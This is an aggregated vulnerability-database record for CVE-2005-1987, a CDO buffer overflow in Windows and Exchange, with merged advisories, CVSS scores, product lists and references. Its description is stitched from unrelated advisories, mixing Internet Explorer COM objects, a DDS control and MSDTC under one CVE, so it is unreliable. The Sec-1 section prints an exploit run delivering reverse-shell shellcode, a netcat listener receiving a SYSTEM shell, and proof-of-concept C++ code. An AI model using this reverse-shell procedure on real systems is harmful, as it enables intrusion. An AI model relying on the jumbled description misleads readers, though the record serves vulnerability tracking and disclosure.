ID

VAR-200510-0005


CVE

CVE-2005-1987


TITLE

Microsoft Internet Explorer can use any COM object

Trust: 0.8

sources: CERT/CC: VU#680526

DESCRIPTION

Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library. The vulnerability has been reported in the following versions: * Windows 2000 (remote code execution) * Windows XP Service Pack 1 (remote code execution) * Windows XP Service Pack 2 (local privilege escalation) * Windows Server 2003 (local privilege escalation) * Windows Server 2003 Service Pack 1 (local privilege escalation) 3) An error in the MSDTC when validating TIP (Transaction Internet Protocol) requests can be exploited to cause the service to stop responding via a specially crafted network message. The malicious TIP message can be transferred through the affected system to another, which causes the MSDTC on both systems to stop responding. Successful exploitation requires that the TIP protocol is enabled for MSDTC. SOLUTION: Apply patches. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . SEC-1 LTD. The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable. The vulnerability can be exploited by crafting an e-mail with a large header name such as "Content-Type<LARGE STRING>:". A failure to correctly determine the length of the string results in a stack overflow. Under certain conditions the vulnerability can also be used to bypass content security mechanisms such as virus and content security scanners. Proof of concept code to recreate the problem is included at the bottom of this advisory. Exploit Availability: Sec-1 do not release exploit code to the general public. Attendees of the Sec-1 Applied Hacking & Intrusion prevention course will receive a copy of this exploit as part of the Sec-1 Exploit Arsenal. See: http://www.sec-1.com/applied_hacking_course.html Exploit Example: [root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53 Enter IP address of your attacking host: 10.0.0.200 Enter Port for shellcode to connect back on: 80 [*]----Connected OK! [*]----Sending MAIL FROM: me@test.com [*]----Sending RCPT TO: <me@test.com> [*]----Sending Malformed E-mail body [*]----Shellcode Length: 316 [*]----Shellcode type: Reverse shell [*]----Done. [!] Note this may take a while. Inetinfo will crash and restart This will happen until a nops are reached. You may also want to clear the queue to restore Inetinfo.exe by deleting malformed e-mail from c:\Inetpub\mailroot\Queue [root@homer PoC]# nc -l -p 80 -v listening on [any] 80 ... 10.0.0.53: inverse host lookup failed: Unknown host connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>c:\whoami NT AUTHORITY\SYSTEM C:\WINNT\system32> Vendor Response: Microsoft have released the following information including a fix, http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CAN-2005-1987 Demonstration: The following CDO code demonstrates the problem. Step 1. Create an E-mail named vuln.eml including a large "Content-Type:" header. Step 2. // Compile with -GX option #import <msado15.dll> no_namespace rename("EOF", "adoEOF") #import <cdosys.dll> rename_namespace("CDO") #include <stdio.h> int main() { CoInitialize(0); try { CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); _StreamPtr spStream(spMsg->GetStream()); spStream->Position = 0; spStream->Type = adTypeBinary; spStream->LoadFromFile("vuln.eml"); spStream->Flush(); for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) { CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; } } catch(_com_error &e) { printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description()); } catch(...) { printf("General exception\n"); } CoUninitialize(); return 0; } CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; Copyright 2005 Sec-1 LTD. All rights reserved. ************************************************************** NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html ************************************************************** . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Technical Cyber Security Alert TA05-284A Microsoft Windows, Internet Explorer, and Exchange Server Vulnerabilities Original release date: October 11, 2005 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Internet Explorer * Microsoft Exchange Server For more complete information, refer to the Microsoft Security Bulletin Summary for October 2005. Overview Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server. I. Description Microsoft Security Bulletins for October 2005 address vulnerabilities in Windows and Internet Explorer. Further information is available in the following US-CERT Vulnerability Notes: VU#214572 - Microsoft Plug and Play fails to properly validate user supplied data Microsoft Plug and Play contains a flaw in the handling of message buffers that may result in local or remote arbitrary code execution or denial-of-service conditions. (CAN-2005-1987) VU#922708 - Microsoft Windows Shell fails to handle shortcut files properly Microsoft Windows Shell does not properly handle some shortcut files and may permit arbitrary code execution when a specially-crafted file is opened. (CAN-2005-0163) II. An attacker may also be able to cause a denial of service. III. Solution Apply Updates Microsoft has provided the updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site. Workarounds Please see the following US-CERT Vulnerability Notes for workarounds. Appendix A. References * Microsoft Security Bulletin Summary for October 2005 - <http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx> * US-CERT Vulnerability Note VU#214572 - <http://www.kb.cert.org/vuls/id/214572> * US-CERT Vulnerability Note VU#883460 - <http://www.kb.cert.org/vuls/id/883460> * US-CERT Vulnerability Note VU#922708 - <http://www.kb.cert.org/vuls/id/922708> * US-CERT Vulnerability Note VU#995220 - <http://www.kb.cert.org/vuls/id/995220> * US-CERT Vulnerability Note VU#180868 - <http://www.kb.cert.org/vuls/id/180868> * US-CERT Vulnerability Note VU#950516 - <http://www.kb.cert.org/vuls/id/950516> * US-CERT Vulnerability Note VU#959049 - <http://www.kb.cert.org/vuls/id/959049> * US-CERT Vulnerability Note VU#680526 - <http://www.kb.cert.org/vuls/id/680526> * CAN-2005-2120 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120> * CAN-2005-1987 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987> * CAN-2005-2122 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122> * CAN-2005-2128 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128> * CAN-2005-2119 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119> * CAN-2005-1978 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978> * CAN-2005-2127 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127> * CAN-2005-0163 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163> * Microsoft Update - <https://update.microsoft.com/microsoftupdate> _________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA05-284A.html> _________________________________________________________________ Feedback can be directed to US-CERT. Please send email to: <cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject. _________________________________________________________________ Revision History Oct 11, 2004: Initial release _________________________________________________________________ Produced 2005 by US-CERT, a government organization. Terms of use <http://www.us-cert.gov/legal.html> _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/>. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c 1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe /9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog== =5hXu -----END PGP SIGNATURE-----

Trust: 6.57

sources: NVD: CVE-2005-1987 // CERT/CC: VU#680526 // CERT/CC: VU#995220 // CERT/CC: VU#883460 // CERT/CC: VU#740372 // CERT/CC: VU#950516 // CERT/CC: VU#939605 // JVNDB: JVNDB-2005-000592 // BID: 15067 // PACKETSTORM: 40623 // PACKETSTORM: 40726 // PACKETSTORM: 40674 // PACKETSTORM: 40619

AFFECTED PRODUCTS

vendor:microsoftmodel: - scope: - version: -

Trust: 4.8

vendor:microsoftmodel:exchange serverscope:eqversion:2000

Trust: 2.7

vendor:microsoftmodel:windows 2000scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows server 2003scope:eqversion:r2

Trust: 1.0

vendor:microsoftmodel:windows xpscope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows server 2003scope:eqversion:sp1

Trust: 1.0

vendor:microsoftmodel:windows server 2003scope:eqversion: -

Trust: 1.0

vendor:microsoftmodel:windows 2000scope: - version: -

Trust: 0.8

vendor:microsoftmodel:windows server 2003scope: - version: -

Trust: 0.8

vendor:microsoftmodel:windows xpscope:eqversion:sp3

Trust: 0.8

vendor:microsoftmodel:windows 2003 serverscope:eqversion:itanium

Trust: 0.6

vendor:microsoftmodel:windows xpscope:eqversion:64-bit

Trust: 0.6

vendor:microsoftmodel:windows 2003 serverscope:eqversion:sp1

Trust: 0.6

vendor:microsoftmodel:windows 2003 serverscope:eqversion:r2

Trust: 0.6

vendor:microsoftmodel:windows 2000scope:eqversion:sp4

Trust: 0.6

vendor:microsoftmodel:windows xpscope:eqversion:sp2

Trust: 0.6

vendor:microsoftmodel:windows xpscope:eqversion:sp1

Trust: 0.6

vendor:microsoftmodel:windows 2003 serverscope:eqversion:64-bit

Trust: 0.6

vendor:nortelmodel:networks centrex ip element managerscope:eqversion:8.0

Trust: 0.3

vendor:nortelmodel:networks centrex ip element managerscope:eqversion:7.0

Trust: 0.3

vendor:nortelmodel:networks centrex ip element managerscope:eqversion:2.5

Trust: 0.3

vendor:nortelmodel:networks centrex ip client managerscope:eqversion:8.0

Trust: 0.3

vendor:nortelmodel:networks centrex ip client managerscope:eqversion:7.0

Trust: 0.3

vendor:nortelmodel:networks centrex ip client managerscope:eqversion:2.5

Trust: 0.3

vendor:nortelmodel:networks centrex ip client managerscope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp professional editionscope:eqversion:x64

Trust: 0.3

vendor:microsoftmodel:windows xp professional sp2scope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp professional sp1scope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp professionalscope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp media center edition sp2scope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp media center edition sp1scope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp media center editionscope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp home sp2scope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp home sp1scope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows xp homescope: - version: -

Trust: 0.3

vendor:microsoftmodel:windows server web edition sp1scope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server web editionscope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server standard editionscope:eqversion:2003x64

Trust: 0.3

vendor:microsoftmodel:windows server standard edition sp1scope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server standard editionscope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server enterprise editionscope:eqversion:2003x64

Trust: 0.3

vendor:microsoftmodel:windows server enterprise edition itanium sp1scope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server enterprise edition itaniumscope:eqversion:20030

Trust: 0.3

vendor:microsoftmodel:windows server enterprise edition sp1scope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server enterprise editionscope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server datacenter editionscope:eqversion:2003x64

Trust: 0.3

vendor:microsoftmodel:windows server datacenter edition itanium sp1scope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server datacenter edition itaniumscope:eqversion:20030

Trust: 0.3

vendor:microsoftmodel:windows server datacenter edition sp1scope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server datacenter editionscope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:windows server sp4scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows server sp3scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows server sp2scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows server sp1scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows serverscope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows professional sp4scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows professional sp3scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows professional sp2scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows professional sp1scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows professionalscope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows datacenter server sp4scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows datacenter server sp3scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows datacenter server sp2scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows datacenter server sp1scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows datacenter serverscope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows advanced server sp4scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows advanced server sp3scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows advanced server sp2scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows advanced server sp1scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:windows advanced serverscope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:iisscope:eqversion:6.0

Trust: 0.3

vendor:microsoftmodel:iisscope:eqversion:5.1

Trust: 0.3

vendor:microsoftmodel:iisscope:eqversion:5.0

Trust: 0.3

vendor:microsoftmodel:exchange server sp3scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:exchange server sp2scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:exchange server sp1scope:eqversion:2000

Trust: 0.3

sources: CERT/CC: VU#680526 // CERT/CC: VU#995220 // CERT/CC: VU#883460 // CERT/CC: VU#740372 // CERT/CC: VU#950516 // CERT/CC: VU#939605 // BID: 15067 // JVNDB: JVNDB-2005-000592 // CNNVD: CNNVD-200510-082 // NVD: CVE-2005-1987

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2005-1987
value: HIGH

Trust: 1.0

CARNEGIE MELLON: VU#680526
value: 28.35

Trust: 0.8

CARNEGIE MELLON: VU#995220
value: 14.70

Trust: 0.8

CARNEGIE MELLON: VU#883460
value: 10.13

Trust: 0.8

CARNEGIE MELLON: VU#740372
value: 10.13

Trust: 0.8

CARNEGIE MELLON: VU#950516
value: 28.10

Trust: 0.8

CARNEGIE MELLON: VU#939605
value: 44.55

Trust: 0.8

NVD: CVE-2005-1987
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200510-082
value: HIGH

Trust: 0.6

nvd@nist.gov: CVE-2005-1987
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

sources: CERT/CC: VU#680526 // CERT/CC: VU#995220 // CERT/CC: VU#883460 // CERT/CC: VU#740372 // CERT/CC: VU#950516 // CERT/CC: VU#939605 // JVNDB: JVNDB-2005-000592 // CNNVD: CNNVD-200510-082 // NVD: CVE-2005-1987

PROBLEMTYPE DATA

problemtype:CWE-120

Trust: 1.0

sources: NVD: CVE-2005-1987

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 40619 // CNNVD: CNNVD-200510-082

TYPE

buffer error

Trust: 0.6

sources: CNNVD: CNNVD-200510-082

CONFIGURATIONS

sources: JVNDB: JVNDB-2005-000592

PATCH

title:MS05-048url:http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx

Trust: 0.8

title:MS05-048url:http://www.microsoft.com/japan/technet/security/bulletin/ms05-048.mspx

Trust: 0.8

title:Microsoft Windows and Microsoft Exchange Server Buffer error vulnerability fixurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113625

Trust: 0.6

sources: JVNDB: JVNDB-2005-000592 // CNNVD: CNNVD-200510-082

EXTERNAL IDS

db:CERT/CCid:VU#883460

Trust: 3.3

db:NVDid:CVE-2005-1987

Trust: 3.0

db:BIDid:15067

Trust: 2.7

db:USCERTid:TA05-284A

Trust: 2.5

db:SECUNIAid:17167

Trust: 2.4

db:CERT/CCid:VU#959049

Trust: 1.7

db:CERT/CCid:VU#680526

Trust: 1.7

db:CERT/CCid:VU#740372

Trust: 1.6

db:CERT/CCid:VU#939605

Trust: 1.6

db:SECTRACKid:1015038

Trust: 1.6

db:SECTRACKid:1015039

Trust: 1.6

db:OSVDBid:19905

Trust: 1.6

db:CERT/CCid:VU#995220

Trust: 0.9

db:SECUNIAid:17161

Trust: 0.9

db:CERT/CCid:VU#950516

Trust: 0.9

db:SECUNIAid:16373

Trust: 0.8

db:BIDid:14594

Trust: 0.8

db:XFid:21895

Trust: 0.8

db:SECTRACKid:1014727

Trust: 0.8

db:SECUNIAid:16480

Trust: 0.8

db:OSVDBid:19902

Trust: 0.8

db:XFid:22473

Trust: 0.8

db:BIDid:15057

Trust: 0.8

db:XFid:21193

Trust: 0.8

db:BIDid:14087

Trust: 0.8

db:SECUNIAid:15891

Trust: 0.8

db:OSVDBid:17680

Trust: 0.8

db:SECTRACKid:1014329

Trust: 0.8

db:JVNDBid:JVNDB-2005-000592

Trust: 0.8

db:CNNVDid:CNNVD-200510-082

Trust: 0.6

db:PACKETSTORMid:40623

Trust: 0.1

db:PACKETSTORMid:40726

Trust: 0.1

db:PACKETSTORMid:40674

Trust: 0.1

db:CERT/CCid:VU#180868

Trust: 0.1

db:CERT/CCid:VU#214572

Trust: 0.1

db:CERT/CCid:VU#922708

Trust: 0.1

db:PACKETSTORMid:40619

Trust: 0.1

sources: CERT/CC: VU#680526 // CERT/CC: VU#995220 // CERT/CC: VU#883460 // CERT/CC: VU#740372 // CERT/CC: VU#950516 // CERT/CC: VU#939605 // BID: 15067 // JVNDB: JVNDB-2005-000592 // PACKETSTORM: 40623 // PACKETSTORM: 40726 // PACKETSTORM: 40674 // PACKETSTORM: 40619 // CNNVD: CNNVD-200510-082 // NVD: CVE-2005-1987

REFERENCES

url:http://www.securityfocus.com/bid/15067

Trust: 2.4

url:http://www.us-cert.gov/cas/techalerts/ta05-284a.html

Trust: 2.4

url:http://www.kb.cert.org/vuls/id/883460

Trust: 2.4

url:http://www.kb.cert.org/vuls/id/959049

Trust: 1.6

url:http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx

Trust: 1.6

url:http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx

Trust: 1.6

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1420

Trust: 1.6

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1201

Trust: 1.6

url:http://secunia.com/advisories/17167

Trust: 1.6

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a848

Trust: 1.6

url:http://securitytracker.com/id?1015038

Trust: 1.6

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/22495

Trust: 1.6

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1515

Trust: 1.6

url:http://securitytracker.com/id?1015039

Trust: 1.6

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1406

Trust: 1.6

url:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html

Trust: 1.6

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a581

Trust: 1.6

url:http://marc.info/?l=bugtraq&m=112915118302012&w=2

Trust: 1.6

url:http://www.osvdb.org/19905

Trust: 1.6

url:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048

Trust: 1.6

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1130

Trust: 1.6

url:http://support.microsoft.com/default.aspx?scid=kb%3b%5bln%5d%3bq907245

Trust: 1.0

url:http://www.microsoft.com/technet/security/bulletin/ms05-051.mspx

Trust: 0.9

url:http://www.microsoft.com/com/default.mspx

Trust: 0.8

url:http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp

Trust: 0.8

url:http://support.microsoft.com/kb/159621

Trust: 0.8

url:http://support.microsoft.com/kb/216434

Trust: 0.8

url:http://www.securityfocus.com/archive/1/391803

Trust: 0.8

url:http://www.kb.cert.org/vuls/id/939605

Trust: 0.8

url:http://www.kb.cert.org/vuls/id/740372

Trust: 0.8

url:http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

Trust: 0.8

url:http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx

Trust: 0.8

url:http://secunia.com/advisories/16373/

Trust: 0.8

url:http://www.microsoft.com/technet/security/bulletin/ms05-050.mspx

Trust: 0.8

url:http://eeye.com/html/research/advisories/ad20051011a.html

Trust: 0.8

url:about vulnerability notes

Trust: 0.8

url:contact us about this vulnerability

Trust: 0.8

url:provide a vendor statement

Trust: 0.8

url:http://www.microsoft.com/technet/security/advisory/906267.mspx

Trust: 0.8

url:http://www.kb.cert.org/vuls/id/680526

Trust: 0.8

url:http://secunia.com/advisories/16480/

Trust: 0.8

url:http://www.securityfocus.com/bid/14594

Trust: 0.8

url:http://www.securitytracker.com/alerts/2005/aug/1014727.html

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/21895

Trust: 0.8

url:http://secunia.com/advisories/17161

Trust: 0.8

url:http://www.securityfocus.com/bid/15057

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/22473

Trust: 0.8

url:http://osvdb.org/displayvuln.php?osvdb_id=19902

Trust: 0.8

url:http://www.f-secure.com/weblog/archives/archive-122005.html#00000737

Trust: 0.8

url:http://www.microsoft.com/technet/security/advisory/903144.mspx

Trust: 0.8

url:http://www.sec-consult.com/184.html

Trust: 0.8

url:http://secunia.com/advisories/15891/

Trust: 0.8

url:http://www.securitytracker.com/alerts/2005/jun/1014329.html

Trust: 0.8

url:http://www.osvdb.org/displayvuln.php?osvdb_id=17680

Trust: 0.8

url:http://www.securityfocus.com/bid/14087

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/21193

Trust: 0.8

url:http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120

Trust: 0.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-1987

Trust: 0.8

url:http://www.frsirt.com/english/advisories/2005/2045

Trust: 0.8

url:http://jvn.jp/cert/jvnta05-284a/

Trust: 0.8

url:http://jvn.jp/tr/trta05-284a/

Trust: 0.8

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-1987

Trust: 0.8

url:http://secunia.com/advisories/17167/

Trust: 0.8

url:http://support.microsoft.com/default.aspx?scid=kb;[ln];q907245

Trust: 0.6

url:http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx

Trust: 0.5

url:http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=bltndetail&documentoid=361442&renditionid=

Trust: 0.3

url:...

Trust: 0.3

url:/archive/1/413159

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2005-1987

Trust: 0.3

url:http://www.sec-1.com/applied_hacking_course.html

Trust: 0.2

url:http://www.sec-1.com

Trust: 0.2

url:http://cve.mitre.org),

Trust: 0.2

url:http://www.microsoft.com/downloads/details.aspx?familyid=1ff26142-6e1e-4e17-9dcd-994b339a69cf

Trust: 0.1

url:http://www.microsoft.com/downloads/details.aspx?familyid=554a86a5-0b03-4ca9-a32d-642e40570424

Trust: 0.1

url:http://www.microsoft.com/downloads/details.aspx?familyid=a6ec1352-042e-4ffb-b379-0e1c06ab9dbe

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://secunia.com/product/21/

Trust: 0.1

url:http://secunia.com/product/1176/

Trust: 0.1

url:http://secunia.com/product/1177/

Trust: 0.1

url:http://www.microsoft.com/downloads/details.aspx?familyid=ca202ccc-792e-4462-9a2f-a20d1f8607f7

Trust: 0.1

url:http://secunia.com/about_secunia_advisories/

Trust: 0.1

url:http://www.microsoft.com/downloads/details.aspx?familyid=20f79ce7-d4db-42d7-8e57-58656a3fb2f7

Trust: 0.1

url:http://secunia.com/product/22/

Trust: 0.1

url:http://secunia.com/product/1175/

Trust: 0.1

url:http://secunia.com/product/16/

Trust: 0.1

url:http://www.microsoft.com/downloads/details.aspx?familyid=4e5b96d8-ba74-4008-80d9-922364abc6ac

Trust: 0.1

url:http://secunia.com/product/1/

Trust: 0.1

url:http://secunia.com/product/20/

Trust: 0.1

url:http://secunia.com/product/1173/

Trust: 0.1

url:http://secunia.com/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/product/1174/

Trust: 0.1

url:http://secunia.com/advisories/17161/

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/883460>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2005-0163

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-1987>

Trust: 0.1

url:http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2119>

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-1978>

Trust: 0.1

url:https://update.microsoft.com/microsoftupdate>

Trust: 0.1

url:http://www.us-cert.gov/cas/>.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2005-2128

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/180868>

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2127>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2005-2122

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/214572>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2005-2119

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/959049>

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/680526>

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2122>

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/950516>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2005-1978

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2128>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2005-2120

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/922708>

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-0163>

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/995220>

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2120>

Trust: 0.1

url:http://www.us-cert.gov/cas/techalerts/ta05-284a.html>

Trust: 0.1

url:http://www.us-cert.gov/legal.html>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2005-2127

Trust: 0.1

sources: CERT/CC: VU#680526 // CERT/CC: VU#995220 // CERT/CC: VU#883460 // CERT/CC: VU#740372 // CERT/CC: VU#950516 // CERT/CC: VU#939605 // BID: 15067 // JVNDB: JVNDB-2005-000592 // PACKETSTORM: 40623 // PACKETSTORM: 40726 // PACKETSTORM: 40674 // PACKETSTORM: 40619 // CNNVD: CNNVD-200510-082 // NVD: CVE-2005-1987

CREDITS

Gary O'leary-Steele garyo@sec-1.com

Trust: 0.6

sources: CNNVD: CNNVD-200510-082

SOURCES

db:CERT/CCid:VU#680526
db:CERT/CCid:VU#995220
db:CERT/CCid:VU#883460
db:CERT/CCid:VU#740372
db:CERT/CCid:VU#950516
db:CERT/CCid:VU#939605
db:BIDid:15067
db:JVNDBid:JVNDB-2005-000592
db:PACKETSTORMid:40623
db:PACKETSTORMid:40726
